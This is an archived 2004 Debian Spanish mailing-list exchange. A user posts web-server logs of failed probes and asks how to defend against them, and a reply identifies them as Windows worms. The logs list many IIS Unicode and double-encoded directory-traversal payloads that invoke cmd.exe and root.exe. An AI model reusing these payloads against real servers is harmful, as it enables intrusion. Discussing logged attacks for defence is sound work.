Son los gusanos esos, q atacan a windows. No te calientes. Podes mirar de q haga log cuando resuelve host nomas . ----- Original Message ----- From: "Raúl Hernández" <[EMAIL PROTECTED]> To: "Lista Debian en español" <debian-user-spanish@lists.debian.org> Sent: Sunday, February 08, 2004 8:22 AM Subject: Ataque al web server
> Hola a [EMAIL PROTECTED], > > tengo un servidor web montado con boa (sencillo y eficaz) para poder > ver la documentación de Debian desde Mozilla con dwww. > > Esta máquina también hace de pasarela de mi mini-red local conectando > por ppp a inet. > > Hoy me ha dado por revisar los logs de bos y me encuentro: > > 62.147.188.173 - - [25/Jan/2004:01:29:44 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:29:47 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:29:50 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:29:53 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:29:55 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:29:57 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:30:00 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:30:02 +0000] "GET > 62.147.188./msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c ../winnt/system32/cmd.exe?/c+dir > 62.147.188. HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:30:05 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:10 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:11 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:12 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:13 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:14 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:16 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 > "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:30:18 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > > Naturalmente mis direcciones IP son del tipo 192.168.0.0 por lo que > esto viene del exterior. > > ¿Alguien puede aclarar qué tipo de ataque es y como evitarlo en el > futuro? Entiendo que no ha tenido éxito, ya que los ficheros referidos > son WINDOG y no existen en mi sistema. > > ¿Es suficiente la directiva Listen 192.168.X.X en /etc/boa/boa.conf > para evitar estos temas? > > También tengo las directivas en /etc/hosts.deny: > ALL: PARANOID > ALL: ALL > y permitiendo solo las direcciones locales en /etc/hosts.allow, por lo > que no me explico cómo han podido acceder desde inet siendo IPs fuera > del rango permitido. > > Gracias y ... > -- > Un saludo. > Raúl Hernández <[EMAIL PROTECTED]> > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] >